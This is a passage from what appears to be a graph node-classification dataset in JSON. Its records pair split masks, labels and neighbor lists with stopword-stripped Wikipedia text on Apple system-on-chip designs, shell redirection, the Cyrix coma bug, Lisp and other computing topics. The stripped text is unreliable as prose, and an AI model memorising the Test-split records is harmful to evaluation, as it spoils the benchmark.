package apple a6 package package pop system chip soc designed apple introduced september 12 2012 launch iphone 5 year later inherited minor successor iphone 5c apple states twice fast twice graphics power compared predecessor apple a5 22 smaller draws less power 45 nm a5 a6 said use 1.3 ghz custom apple-designed armv7 based dual-core cpu called swift rather licensed cpu arm like previous designs integrated 266 mhz triple-core powervr sgx 543mp3 graphics processing unit gpu swift core a6 uses new tweaked instruction set armv7s featuring elements arm cortex-a15 support advanced simd v2 vfpv4 a6 manufactured samsung high-κ metal gate hkmg 32 nm process apple a6x system-on-a-chip soc designed apple inc. introduced launch fourth generation ipad october 23 2012 high performance variant apple a6 apple claims a6x twice cpu performance twice graphics performance predecessor apple a5x like a6 soc continues use dual-core swift cpu new quad core gpu quad channel memory slightly higher 1.4 ghz cpu clock rate uses integrated quad-core powervr sgx 554mp4 graphics processing unit gpu running 300 mhz quad-channel memory subsystem compared a6 a6x 30 larger continues manufactured samsung high-κ metal gate hkmg 32 nm process apple a7 package package pop 64-bit system-on-a-chip soc designed apple first appearance iphone 5s introduced september 10 2013 chip would also used ipad air ipad mini 2 ipad mini 3 apple states twice fast twice graphics power compared predecessor apple a6 a7 features apple-designed 1.3–1.4 ghz 64-bit armv8-a dual-core cpu called cyclone integrated powervr g6430 gpu four cluster configuration armv8-a architecture doubles number registers a7 compared a6 31 general purpose registers 64-bits wide 32 floating-point/neon registers 128-bits wide a7 manufactured samsung high-κ metal gate hkmg 28 nm process chip includes 1 billion transistors die 102 mm size apple a8 package package pop 64-bit system-on-a-chip soc designed apple manufactured tsmc first appearance iphone 6 iphone 6 plus introduced september 9 2014 year later would drive ipad mini 4 apple states 25 cpu performance 50 graphics performance drawing 50 power compared predecessor apple a7 february 9 2018 apple released homepod powered apple a8 1 gb ram a8 features apple-designed 1.4 ghz 64-bit armv8-a dual-core cpu integrated powervr gx6450 gpu four cluster configuration a8 manufactured 20 nm process tsmc replaced samsung manufacturer apple mobile device processors contains 2 billion transistors despite double number transistors compared a7 physical size reduced 13 89 mm consistent shrink known new microarchitecture apple a8x 64-bit system chip soc designed apple introduced launch ipad air 2 october 16 2014 high performance variant apple a8 apple states 40 cpu performance 2.5 times graphics performance predecessor apple a7 unlike a8 soc uses triple-core cpu new octa-core gpu dual channel memory slightly higher 1.5 ghz cpu clock rate uses integrated octa-core powervr gxa6850 graphics processing unit gpu running 450 mhz dual-channel memory subsystem manufactured tsmc 20 nm fabrication process consists 3 billion transistors apple a9 64-bit arm based system chip soc designed apple inc first appeared iphone 6s 6s plus introduced september 9 2015 apple states 70 cpu performance 90 graphics performance compared predecessor apple a8 dual sourced first apple soc manufactured samsung 14 nm finfet lpe process tsmc 16 nm finfet process subsequently included iphone se ipad 2017 apple a9x 64-bit system chip soc designed apple inc announced september 9 2015 released november 11 2015 first appeared ipad pro offers 80 cpu performance two times gpu performance predecessor apple a8x manufactured tsmc using 16 nm finfet process apple a10 fusion 64-bit arm based system chip soc designed apple inc first appeared iphone 7 7 plus introduced september 7 2016 a10 also featured ipad 2018 ipod touch 7th generation new quad core design two high performance cores two smaller highly efficient cores 40 faster a9 50 faster graphics made tsmc 16 nm finfet process apple a10x fusion 64-bit arm based system chip soc designed apple inc first appeared 10.5 ipad pro second generation 12.9 ipad pro announced june 5 2017 variant a10 apple claims 30 percent faster cpu performance 40 percent faster gpu performance predecessor a9x september 12 2017 apple announced apple tv 4k would powered a10x chip made tsmc 10 nm finfet process apple a11 bionic 64-bit arm-based system chip soc designed apple inc first appeared iphone 8 iphone 8 plus iphone x introduced september 12 2017 two high-performance cores 25 faster a10 fusion four high-efficiency cores 70 faster energy-efficient cores a10 apple a12 bionic 64-bit arm-based system chip soc designed apple inc first appeared iphone xs xs max xr introduced september 12 2018 also within 2019 models ipad air ipad mini two high-performance cores 15 faster a11 bionic four high-efficiency cores 50 lower power usage energy-efficient cores a11 bionic a12 manufactured tsmc using 7 nm finfet process first ship smartphone apple a12x bionic 64-bit arm-based system chip soc designed apple inc first appeared 11.0 ipad pro third generation 12.9 ipad pro announced october 30 2018 offers 35 faster single-core 90 faster multi-core cpu performance predecessor a10x four high-performance cores four high-efficiency cores a12x manufactured tsmc using 7 nm finfet process first ship tablet apple series family systems package sip used apple watch uses customized application processor together memory storage support processors wireless connectivity sensors i/o comprise complete computer single package designed apple manufactured contract manufacturers samsung apple s1 integrated computer designed apple includes memory storage support circuits like wireless modems i/o controllers sealed integrated package announced september 9 2014 part wish could say event first appearance original apple watch used apple watch series 1 dual-core processor almost identical s2 exception built-in gps receiver used apple watch series 2 dual-core processor built-in gps receiver used apple watch series 3 dual-core processor 70 faster apple s2 built-in gps receiver also option cellular modem internal esim module also includes w2 chip used apple watch series 4 apple designed custom 64-bit dual-core processor 2x faster performance also contains w3 wireless chip supports bluetooth 5 apple t1 chip armv7 soc apple driving system management controller smc touch id sensor 2016 2017 macbook pro touch bar addition traditional tasks smc chip operates secure enclave processing encryption fingerprints well acting gatekeeper microphone facetime hd camera protecting possible targets potential hacking attempts t1 runs bridgeos variant watchos separate intel cpu running macos apple t2 chip soc apple first released imac pro 2017 64-bit armv8 chip variant a10 t8010 runs separate operating system called bridgeos 2.0 watchos derivative provides secure enclave encrypted keys gives users ability lock computer boot process handles system functions like camera audio control handles on-the-fly encryption decryption solid-state drive t2 also delivers enhanced imaging processing imac pro facetime hd camera july 12 2018 apple released updated macbook pro includes t2 chip among things enables hey siri feature november 7 2018 apple released updated mac mini macbook air t2 chip apple w series family system chip soc wireless chips focus bluetooth wi-fi connectivity apple w1 soc apple used 2016 airpods select beats headphones maintains bluetooth class 1 connection computer device decodes audio stream sent apple w2 wireless chip apple used apple watch series 3 integrated apple s3 sip apple released implementation chip makes wi-fi 85 faster bluetooth wi-fi 50 power efficient previous model chip design apple w3 wireless chip apple used apple watch series 4 integrated apple s4 sip supports bluetooth 5.0 apple h1 chip first used 2019 version airpods specifically designed headphones bluetooth 5.0 offers 30 lower latency compared w1 chip prior version airpods",
    "neighbors": [
      7170,
      10755,
      9732,
      1549,
      9741,
      5647,
      8720,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      1563,
      8222,
      1057,
      38,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      8237,
      9774,
      2097,
      1074,
      8754,
      9784,
      8250,
      1083,
      8253,
      10813,
      576,
      7745,
      1090,
      3575,
      7235,
      7747,
      11333,
      2635,
      1614,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      99,
      5733,
      8806,
      3691,
      8812,
      11374,
      2673,
      6258,
      2676,
      10357,
      6264,
      10361,
      4220,
      10365,
      2686,
      638,
      6783,
      7806,
      10878,
      644,
      4741,
      9863,
      8842,
      6283,
      7820,
      7824,
      146,
      147,
      659,
      1170,
      7830,
      6807,
      5784,
      1177,
      666,
      4251,
      3228,
      5786,
      7833,
      2207,
      4258,
      7842,
      7844,
      4773,
      11430,
      171,
      2735,
      3248,
      6834,
      9911,
      9913,
      8890,
      4283,
      3772,
      7869,
      8893,
      8383,
      8896,
      10945,
      6654,
      4807,
      9928,
      713,
      4810,
      3790,
      1744,
      7378,
      4821,
      3286,
      9430,
      3293,
      4318,
      11487,
      9952,
      2788,
      3301,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      9964,
      1776,
      10481,
      6391,
      8441,
      3323,
      3835,
      7420,
      2814,
      2819,
      7432,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      2838,
      4888,
      5912,
      8480,
      10023,
      5417,
      810,
      2862,
      4399,
      4910,
      7988,
      10548,
      11062,
      7991,
      1849,
      11066,
      2363,
      6971,
      2365,
      2366,
      7998,
      9022,
      11257,
      1346,
      6978,
      8003,
      6981,
      838,
      8514,
      10051,
      10562,
      11080,
      5963,
      8525,
      1871,
      1872,
      2383,
      9042,
      2388,
      8534,
      344,
      3928,
      8540,
      4957,
      6495,
      8544,
      1377,
      9063,
      10602,
      1387,
      3948,
      11629,
      10608,
      6001,
      373,
      1400,
      8058,
      9084,
      7549,
      11649,
      2439,
      392,
      3977,
      6023,
      6539,
      7052,
      1428,
      3483,
      4508,
      10658,
      2979,
      5028,
      7077,
      9123,
      9638,
      11173,
      8109,
      10675,
      3511,
      2492,
      446,
      7614,
      9665,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7118,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      10199,
      4569,
      8665,
      2524,
      7133,
      9182,
      4068,
      5093,
      2023,
      8170,
      10734,
      5616,
      6130,
      5619,
      7154,
      1014,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 6496,
    "label": 4,
    "text": "AOL_Active_Virus_Shield:aol active virus shield aol active virus shield commonly referred avs free antivirus utility made available aol engine based one used kaspersky anti-virus program longer available active virus shield includes numerous features found kaspersky anti-virus software main feature malware scanning uses kaspersky underlying engine detects variety malware viruses spyware even joke programs also offers real-time file e-mail scanning protection latest version active virus shield version 6.0.2.621 supports windows vista active virus shield light compared commercial anti-virus products also consume much memory startup program also benefits kaspersky regular definition updates typically around every two hours enable new viruses effectively detected programs update less regularly addition active virus shield better detection rates free programs avg free avast home edition active virus shield lack features kaspersky 6.0 proactive protection http protection license provided valid one year although email address used initially easily used renew 10 times also support mail scanning using tls ssl users also reported compatibility problems certain applications mcafee personal firewall plus zonealarm logitech products active virus shield longer available download august 1 2007 replaced mcafee virus scan plus special edition aol available free users free aol account even though active virus shield longer available officially latest version program still obtained mirror server hosted help also still offered already using application",
    "neighbors": [
      2049,
      7809,
      2213,
      488,
      6797,
      7983,
      2005,
      10392,
      7739,
      7515
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6497,
    "label": 4,
    "text": "Improper_input_validation:improper input validation improper input validation unchecked user input type vulnerability computer software may used security exploits examples include",
    "neighbors": [
      1474,
      899,
      5636,
      4198,
      8990,
      10959,
      6423,
      3708,
      2878
    ],
    "mask": "None"
  },
  {
    "node_id": 6498,
    "label": 2,
    "text": "Redirection_(computing):redirection computing computing redirection form interprocess communication function common command-line interpreters including various unix shells redirect standard streams user-specified locations unix-like operating systems programs redirection dup2 2 system call less-flexible higher-level stdio analogues freopen 3 popen 3 redirection usually implemented placing certain characters commands typically syntax characters follows using codice_1 redirect input codice_2 redirect output command1 file1 executes command1 placing output file1 opposed displaying terminal usual destination standard output clobber existing data file1 using command1 file1 executes command1 file1 source input opposed keyboard usual source standard input command1 infile outfile combines two capabilities command1 reads infile writes outfile append output end file rather clobbering codice_3 operator used command1 » file1 read stream literal inline file passed standard input one use document using codice_4 operator tr a-z a-z « end_text one two three uno dos tres end_text read string one use string using codice_5 operator tr a-z a-z « one two three numbers= one two three tr a-z a-z « numbers programs run together one program reads output another need explicit intermediate file command1 command2 executes command1 using output input command2 commonly called piping character known pipe two programs performing commands may run parallel storage space working buffers linux allows 64k buffer plus whatever work space command processing requires example sort command unable produce output input records read last record received might turn first sorted order dr. alexia massalin experimental operating system synthesis would adjust priority task ran according fullness input output buffers produces end result using two redirects temporary file command1 tempfile command2 tempfile rm tempfile command2 start executing command1 finished sufficiently large scratch file required hold intermediate results well whatever work space task required example although dos allows pipe syntax employs second approach thus suppose long-running program worker produces various messages works second program timestamp copies record stdin stdout prefixed system date time record received sequence worker timestamp logfile.txt would produce timestamps worker finished merely showing swiftly output file could read written good example command piping combining codice_6 another command achieve something interactive non-interactive shell e.g echo -e 'user\\npass ftp localhost runs ftp client input user press return pass casual use initial step pipeline often codice_7 codice_6 reading file string often replaced input indirection string use cat piping rather input redirection known useless use cat example following commands cat infile cmd echo string cmd echo -e 'user\\npass ftp localhost replaced cmd infile cmd « string ftp localhost « 'user\\npass' codice_6 often shell-internal command use criticized cat external command unix shells derived original bourne shell first two actions modified placing number file descriptor immediately character affect stream used redirection unix standard i/o streams example command1 2 file1 executes command1 directing standard error stream file1 shells derived csh c shell syntax instead appends ampersand character redirect characters thus achieving similar result reason distinguish file named 1 stdout i.e 'cat file 2 1 vs 'cat file 2 1 first case stderr redirected file named 1 second stderr redirected stdout another useful capability redirect one standard file handle another popular variation merge standard error standard output error messages processed together alternately usual output example find -name .profile results 2 1 try find files named .profile executed without redirection output hits stdout errors e.g lack privilege traverse protected directories stderr standard output directed file results error messages appear console see hits error messages file results merge stderr handle 2 stdout handle 1 using 2 1 merged output piped another program file merge sequence 2 1 must precede pipe symbol thus find -name .profile 2 1 less simplified non-posix conforming form command command file 2 1 available bourne shell prior version 4 final release standard shell debian almquist shell used debian/ubuntu command file command file possible use codice_10 codice_2 result commonly misunderstood rule redirection sets handle output stream independently codice_10 sets handle codice_13 whatever handle codice_14 points point usually stdout codice_2 redirects handle codice_14 something else e.g file change handle codice_13 still points stdout following example standard output written file errors redirected stderr stdout i.e sent screen command 2 1 file write errors standard output file order reversed standard output would first redirected file stderr would additionally redirected stdout handle already changed point file command file 2 1 redirection piping tokens chained together create complex commands example sort infile uniq -c sort -n outfile sorts lines infile lexicographical order writes unique lines prefixed number occurrences sorts resultant output numerically places final output outfile type construction used commonly shell scripts batch files standard command tee redirect output command several destinations ls -lrt tee xyz directs file list output standard output file xyz",
    "neighbors": [
      5888,
      4870,
      8975,
      4369,
      10387,
      532,
      5012,
      5397,
      6813,
      10407,
      8369,
      11442,
      8499,
      4409,
      5698,
      7364,
      2120,
      213,
      8414,
      2786,
      10083,
      742,
      4968,
      6377,
      8301,
      1277
    ],
    "mask": "Test"
  },
  {
    "node_id": 6499,
    "label": 2,
    "text": "Sideways_address_space:sideways address space sideways address space acorn bbc microcomputer electron master-series microcomputer acorn bank switching implementation providing permanent system expansion days hard disk drives even floppy disk drives commonplace filing systems application utility software drivers made available sideways roms extra ram could fitted via sideways address space advanced user guide bbc micro refers sideways address space paged roms predated use address space ram expansion bbc b+ b+ 128 bbc master featured sideways ram standard machines used 8-bit 6502 65c102 processors 16-bit address space address space split 32 kib ram 0x0000 0x7fff 16 kib sideways address space 0x8000 0xbfff 16 kib operating system space 0xc000 0xffff sideways address space bank-switched referred acorn paged address space allows access one 16 kib bank time bank rom ram bbc micro bbc master rom sockets motherboard four bbc micro take sideways roms bbc micro shipped single rom containing bbc basic roms added computer add software remain available times electron sideways address space exposed addition plus 1 add-on third-party equivalent plus 1 also introduced cartridge slots carried bbc master design alternative way package roms sideways roms permitted addition new filing systems os disc filing system application utility software software supplied roms two main benefits loads instantaneously requires little ram operate may use dedicated paged rom area ram normal software keeps clear allowed application software working space would normally possible utility software debuggers operate software held ram first bytes sideways roms contain details inform os handle include language service entry points rom type code version number pointer copyright information reset os validates sideways bank checking copyright string operation os talks valid roms jumping two entry points specific value accumulator set provides clean api expanding operating system negotiating bank switching ram sharing roms two entry points service entry point provides api access rom language entry point starting point application software contained rom service roms need language entry point exist extend os language roms roms provide application software gain name fact bbc basic language supplied default rom bank 15 roms often contain entry points user software must service entry point allow os call pure service roms typically extend features os without providing application software bbc micro electron require one language rom present post provide computer user interface else os report language halt version acorn mos bbc master built-in command line present default language rom configured addition rom banks ram could added computer via sideways address space could either used load use rom-images disk extra workspace machine code programs bbc model b hardwired deny writing sideways area write signal needs collected somewhere methods vary two common methods removing chips board placing expansion board occupies chips original sockets fitting ram module rom socket flying lead connected write signal elsewhere motherboard 64kb model b+ 12kb special sideways ram used sideways address selected high bit rom select register could used load rom images 128kb model b+ expansion board 64kb regular sideways ram addition 12kb special sideways ram main board bbc master came 64kb regular sideways ram could configured motherboard links banks rom ram addition 4kb special sideways ram 8kb ram paged operating system unlike b+ special sideways ram available user applications memory areas master used operating system filing system workspace electron cartridge ports wired assumption 'd used roms much bbc micro master slots replace ready signal r/w signal ram also plugged external cartridge ports acorn mos supports 16 sideways banks due limited motherboard space extra sideways sockets made available third-party expansion boards certain boards watford electronics sidewise board also provided option permanent battery backed-up ram allows developer testing new sideways rom software without burning eprom attempt write-protect switch could used prevent contents sideways ram modified",
    "neighbors": [
      6210,
      9762,
      1029,
      3722,
      8429,
      7983,
      7281,
      10130,
      11033,
      9563,
      5598
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6500,
    "label": 2,
    "text": "IDispatch:idispatch idispatch interface exposes ole automation protocol extending iunknown one standard interfaces exposed com objects com distinguishes three interface types custom vtable-based iunknown interfaces dispatch idispatch interfaces supporting introspection dual interfaces supporting types automation idispatch interface allows client application find properties methods supported object run-time i.e implements concept rtti also provides information necessary invoke properties methods client applications need aware object members compiled allows com activex objects called scripting programs platforms asp server javascript internet explorer calling conventions known time iis ie built contrast simple object library compiled linked program e.g dll call needs know function name parameters compile time script writer ask com object method property already knows documentation client execute function invoke provided idispatch interface form late-binding sort capability also supported dynamic data exchange dde never became popular due low-level dispatch interfaces flexible suffer additional introspection invocation overhead compared custom interfaces therefore often good idea support interface types dual interfaces way clients supporting vtable-based invocation use custom interface instead dispatch counterpart property method implemented object supports idispatch interface called dispatch id often abbreviated dispid dispid primary means identifying property method must supplied invoke function property method invoked along array variants containing parameters getidsofnames function used get appropriate dispid property method name string format idispatch derives iunknown extends four additional methods idispatch interface id defined guid value 00020400-0000-0000-c000-000000000046",
    "neighbors": [
      11361,
      2146,
      3462,
      9813,
      4439,
      8473
    ],
    "mask": "Test"
  },
  {
    "node_id": 6501,
    "label": 4,
    "text": "Cyrix_coma_bug:cyrix coma bug cyrix coma bug design flaw cyrix 6x86 6x86l early 6x86mx processors allows non-privileged program hang computer according andrew balsa around time discovery f00f bug intel pentium serguei shtyliov moscow found flaw cyrix processor developing ide disk driver assembly language alexandr konosevich omsk researched bug coauthored article uwe post german technology magazine c't calling hidden cli bug cli instruction disables interrupts x86 architecture balsa member linux-kernel mailing list confirmed following c program uses inline x86-specific assembly language could compiled run unprivileged user execution program renders processor completely useless rebooted enters infinite loop interrupted allows user access cyrix system bug perform denial-of-service attack similar execution halt catch fire instruction although coma bug one particular instruction causes bug interrupt mask interrupts explicitly disabled instead anomaly cyrix instruction pipeline prevents interrupts serviced duration loop since loop never ends interrupts never serviced xchg instruction atomic meaning instructions allowed change state system executed order ensure atomicity designers cyrix made xchg uninterruptible due pipelining branch predicting however another xchg enters pipeline previous one completes causing deadlock fix unintentional instances bug insert another instruction loop nop instruction good candidate cyrix suggested serializing xchg opcode thus bypassing pipeline however techniques serve prevent deliberate attacks one way prevent bug enable bit 0x10 configuration register ccr1 disables implicit bus locking normally done xchg instruction since cpus affected bug designed work multi-processor systems loss xchg atomicity harmless",
    "neighbors": [
      10786,
      8231,
      2409,
      1776,
      2045,
      5457,
      499,
      5744,
      8501,
      823,
      1915,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 6502,
    "label": 9,
    "text": "Lisp_(programming_language):lisp programming language lisp historically lisp family computer programming languages long history distinctive fully parenthesized prefix notation originally specified 1958 lisp second-oldest high-level programming language widespread use today fortran older one year lisp changed since early days many dialects existed history today best-known general-purpose lisp dialects clojure common lisp scheme lisp originally created practical mathematical notation computer programs influenced notation alonzo church lambda calculus quickly became favored programming language artificial intelligence ai research one earliest programming languages lisp pioneered many ideas computer science including tree data structures automatic storage management dynamic typing conditionals higher-order functions recursion self-hosting compiler read–eval–print loop name lisp derives list processor linked lists one lisp major data structures lisp source code made lists thus lisp programs manipulate source code data structure giving rise macro systems allow programmers create new syntax new domain-specific languages embedded lisp interchangeability code data gives lisp instantly recognizable syntax program code written s-expressions parenthesized lists function call syntactic form written list function operator name first arguments following instance function takes three arguments would called john mccarthy developed lisp 1958 massachusetts institute technology mit mccarthy published design paper communications acm 1960 entitled recursive functions symbolic expressions computation machine part showed simple operators notation functions one build turing-complete language algorithms information processing language first ai language 1955 1956 already included many concepts list-processing recursion came used lisp mccarthy original notation used bracketed m-expressions would translated s-expressions example m-expression equivalent s-expression lisp implemented programmers rapidly chose use s-expressions m-expressions abandoned m-expressions surfaced short-lived attempts mlisp horace enea cgol vaughan pratt lisp first implemented steve russell ibm 704 computer russell read mccarthy paper realized mccarthy surprise lisp eval function could implemented machine code result working lisp interpreter could used run lisp programs properly evaluate lisp expressions two assembly language macros ibm 704 became primitive operations decomposing lists contents address part register number contents decrement part register number register used refer registers computer central processing unit cpu lisp dialects still use operations return first item list rest list respectively first complete lisp compiler written lisp implemented 1962 tim hart mike levin mit compiler introduced lisp model incremental compilation compiled interpreted functions intermix freely language used hart levin memo much closer modern lisp style mccarthy earlier code lisp difficult system implement compiler techniques stock hardware 1970s garbage collection routines developed mit graduate student daniel edwards made practical run lisp general-purpose computing systems efficiency still problem led creation lisp machines dedicated hardware running lisp environments programs 1980s 1990s great effort made unify work new lisp dialects mostly successors maclisp zetalisp nil new implementation lisp single language new language common lisp somewhat compatible dialects replaced book common lisp language notes compatibility various constructs 1994 ansi published common lisp standard ansi x3.226-1994 information technology programming language common lisp since inception lisp closely connected artificial intelligence research community especially pdp-10 systems lisp used implementation programming language micro planner used famous ai system shrdlu 1970s ai research spawned commercial offshoots performance existing lisp systems became growing issue sixty-year history lisp spawned many variations core theme s-expression language moreover given dialect may several implementations—for instance dozen implementations common lisp differences dialects may quite visible—for instance common lisp uses keyword codice_1 name function scheme uses codice_2 within dialect standardized however conforming implementations support core language different extensions libraries declined somewhat 1990s lisp experienced resurgence interest 2000 new activity focused around implementations common lisp scheme emacs lisp clojure racket includes development new portable libraries applications many new lisp programmers inspired writers paul graham eric s. raymond pursue language others considered antiquated new lisp programmers often describe language eye-opening experience claim substantially productive languages increase awareness may contrasted ai winter lisp brief gain mid-1990s dan weinreb lists survey common lisp implementations eleven actively maintained common lisp implementations scieneer common lisp new commercial implementation forked cmucl first release 2002 open source community created new supporting infrastructure cliki wiki collects common lisp related information common lisp directory lists resources lisp popular irc channel allows sharing commenting code snippets support lisppaste irc bot written lisp planet lisp collects contents various lisp-related blogs lispforum users discuss lisp topics lispjobs service announcing job offers weekly news service weekly lisp news common-lisp.net hosting site open source common lisp projects quicklisp library manager common lisp fifty years lisp 1958–2008 celebrated lisp50 oopsla regular local user meetings boston vancouver hamburg events include european common lisp meeting european lisp symposium international lisp conference scheme community actively maintains twenty implementations several significant new implementations chicken gambit gauche ikarus larceny ypsilon developed 2000s decade revised report algorithmic language scheme standard scheme widely accepted scheme community scheme requests implementation process created lot quasi standard libraries extensions scheme user communities individual scheme implementations continue grow new language standardization process started 2003 led rrs scheme standard 2007 academic use scheme teaching computer science seems declined somewhat universities longer using scheme computer science introductory courses mit uses python instead scheme undergraduate computer science program mitx massive open online course several new dialects lisp arc hy nu liskell lfe lisp flavored erlang parser julia implemented femtolisp dialect scheme julia inspired scheme often considered lisp common lisp scheme represent two major streams lisp development languages embody significantly different design choices common lisp successor maclisp primary influences lisp machine lisp maclisp nil s-1 lisp spice lisp scheme many features lisp machine lisp large lisp dialect used program lisp machines designed efficiently implementable personal computer workstation common lisp general-purpose programming language thus large language standard including many built-in data types functions macros language elements object system common lisp object system common lisp also borrowed certain features scheme lexical scoping lexical closures common lisp implementations available targeting different platforms llvm java virtual machine x86-64 powerpc alpha arm motorola 68000 mips operating systems windows macos linux solaris freebsd netbsd openbsd dragonfly bsd heroku scheme statically scoped properly tail-recursive dialect lisp programming language invented guy l. steele jr. gerald jay sussman designed exceptionally clear simple semantics different ways form expressions designed decade earlier common lisp scheme minimalist design much smaller set standard features certain implementation features tail-call optimization full continuations specified common lisp wide variety programming paradigms including imperative functional message passing styles find convenient expression scheme scheme continues evolve series standards revised report algorithmic language scheme series scheme requests implementation clojure recent dialect lisp targets mainly java virtual machine common language runtime clr python vm ruby vm yarv compiling javascript designed pragmatic general-purpose language clojure draws considerable influences haskell places strong emphasis immutability clojure provides access java frameworks libraries optional type hints type inference calls java avoid reflection enable fast primitive operations lisp dialects used scripting languages many applications best-known emacs lisp emacs editor autolisp later visual lisp autocad nyquist audacity scheme lilypond potential small size useful scheme interpreter makes particularly popular embedded scripting examples include siod tinyscheme successfully embedded gimp image processor generic name script-fu librep lisp interpreter john harper originally based emacs lisp language embedded sawfish window manager lisp first language structure program code represented faithfully directly standard data structure—a quality much later dubbed homoiconicity thus lisp functions manipulated altered even created within lisp program without lower-level manipulations generally considered one main advantages language regard expressive power makes language suitable syntactic macros metacircular evaluation conditional using if–then–else syntax invented mccarthy fortran context proposed inclusion algol made part algol 58 specification lisp mccarthy used general cond -structure algol 60 took if–then–else popularized lisp deeply influenced alan kay leader research team developed smalltalk xerox parc turn lisp influenced smalltalk later dialects adopting object-oriented programming features inheritance classes encapsulating instances message passing etc 1970s flavors object system introduced concept multiple inheritance mixin common lisp object system provides multiple inheritance multimethods multiple dispatch first-class generic functions yielding flexible powerful form dynamic dispatch served template many subsequent lisp including scheme object systems often implemented via metaobject protocol reflective metacircular design object system defined terms lisp second language smalltalk still one languages possess metaobject system many years later alan kay suggested result confluence features smalltalk lisp could regarded properly conceived object-oriented programming systems lisp introduced concept automatic garbage collection system walks heap looking unused memory progress modern sophisticated garbage collection algorithms generational garbage collection stimulated use lisp edsger w. dijkstra 1972 turing award lecture said largely resource requirements respect early computing hardware including early microprocessors lisp become popular outside ai community fortran algol-descended c language suitability complex dynamic applications lisp enjoying resurgence popular interest 2010s lisp expression oriented language unlike languages distinction made expressions statements code data written expressions expression evaluated produces value common lisp possibly multiple values embedded expressions value data type mccarthy 1958 paper introduced two types syntax symbolic expressions s-expressions sexps mirror internal representation code data meta expressions m-expressions express functions s-expressions m-expressions never found favor almost lisps today use s-expressions manipulate code data use parentheses lisp immediately obvious difference programming language families result students long given lisp nicknames lost stupid parentheses lots irritating superfluous parentheses however s-expression syntax also responsible much lisp power syntax extremely regular facilitates manipulation computer however syntax lisp limited traditional parentheses notation extended include alternative notations example xmlisp common lisp extension employs metaobject protocol integrate s-expressions extensible markup language xml reliance expressions gives language great flexibility lisp functions written lists processed exactly like data allows easy writing programs manipulate programs metaprogramming many lisp dialects exploit feature using macro systems enables extension language almost without limit lisp list written elements separated whitespace surrounded parentheses example list whose elements three atoms values implicitly typed respectively two integers lisp-specific data type called symbol declared empty list also represented special atom entity lisp atom list expressions written lists using prefix notation first element list name function name macro lambda expression name special operator see remainder list arguments example function returns arguments list expression evaluates list quote preceding example special operator returns argument without evaluating unquoted expressions recursively evaluated enclosing expression evaluated example evaluates list note third argument list lists nested arithmetic operators treated similarly expression evaluates 10 equivalent infix notation would lisp notion operators implemented algol-derived languages arithmetic operators lisp variadic functions n-ary able take number arguments c-style '++ increment operator sometimes implemented name incf giving syntax equivalent setq x x 1 returning new value x special operators sometimes called special forms provide lisp control structure example special operator takes three arguments first argument non-nil evaluates second argument otherwise evaluates third argument thus expression evaluates course would useful non-trivial expression substituted place lisp also provides logical operators operators short circuit evaluation return first nil non-nil argument respectively evaluate james another special operator used bind variables values evaluated within expression operator also used create functions arguments list arguments expression expressions function evaluates returned value value last expression evaluated expression evaluates function applied takes one argument binds returns number one greater argument lambda expressions treated differently named functions invoked way therefore expression evaluates 're function application execute anonymous function passing value 5 named functions created storing lambda expression symbol using defun macro original lisp two fundamental data types atoms lists list finite ordered sequence elements element either atom list atom number symbol symbol essentially unique named item written alphanumeric string source code used either variable name data item symbolic processing example list contains three elements symbol list number 2 essential difference atoms lists atoms immutable unique two atoms appeared different places source code written exactly way represented object whereas list separate object could altered independently lists could distinguished lists comparison operators data types introduced later lisp dialects programming styles evolved concept atom lost importance many dialects still retained predicate atom legacy compatibility defining true object cons lisp list implemented singly linked list cell list called cons scheme pair composed two pointers called car cdr respectively equivalent fields discussed article linked list many data structures built cons cells one basic called proper list proper list either special empty list symbol cons points datum may another cons structure list points another proper list given cons taken head linked list car points first element list cdr points rest list reason functions also called referring conses part linked list rather say tree thus lisp list atomic object instance container class c++ java would list nothing aggregate linked conses variable refers given list simply pointer first cons list traversal list done cdring list taking successive cdrs visit cons list using several higher-order functions map function list conses lists universal lisp systems common misconception lisp data structures fact simplistic lisps data structures vectors arrays hash tables structures forth parenthesized s-expressions represent linked list structures several ways represent list s-expression cons written dotted-pair notation car cdr longer proper list might written dotted-pair notation conventionally abbreviated list notation improper list may written combination two – list three conses whose last cdr i.e. list fully specified form lisp provides many built-in procedures accessing controlling lists lists created directly procedure takes number arguments returns list arguments way lists constructed cons pairs procedure used add element front list note procedure asymmetric handles list arguments lists constructed procedure appends two lists one another lisp lists linked lists appending two lists asymptotic time complexity formula_1 lisp lists simple linked lists share structure one another say two lists tail final sequence conses instance execution following common lisp code lists respectively however tail structure lists copy cons cells pointing memory locations lists sharing structure rather copying give dramatic performance improvement however technique interact undesired ways functions alter lists passed arguments altering one list replacing affect changes thereby also changes – possibly unexpected result source bugs functions alter arguments documented destructive reason aficionados functional programming avoid destructive functions scheme dialect favors functional style names destructive functions marked cautionary exclamation point bang —such read set car bang replaces car cons common lisp dialect destructive functions commonplace equivalent named replace car function rarely seen however common lisp includes special facility make easier define use destructive functions frequent style common lisp write code functionally without destructive calls prototyping add destructive calls optimization safe lisp evaluates expressions entered user symbols lists evaluate usually simpler expression – instance symbol evaluates value variable names evaluates however forms evaluate entering lisp returns expression also marked prevent evaluated necessary symbols lists role special operator abbreviation one quotation mark instance usually entering symbol returns value corresponding variable error variable refer literal symbol enter usually common lisp scheme also support backquote operator termed quasiquote scheme entered character grave accent almost plain quote except allows expressions evaluated values interpolated quoted list comma unquote comma-at splice operators variable value evaluates evaluates backquote often used defining macro expansions self-evaluating forms quoted forms lisp equivalent literals may possible modify values mutable literals program code instance function returns quoted form code calls function modifies form may alter behavior function subsequent iterations modifying quoted form like generally considered bad style defined ansi common lisp erroneous resulting undefined behavior compiled files file-compiler coalesce similar constants put write-protected memory etc. lisp formalization quotation noted douglas hofstadter gödel escher bach others example philosophical idea self-reference lisp family splits use dynamic static a.k.a lexical scope clojure common lisp scheme make use static scoping default newlisp picolisp embedded languages emacs autocad use dynamic scoping since version 24.1 emacs uses dynamic 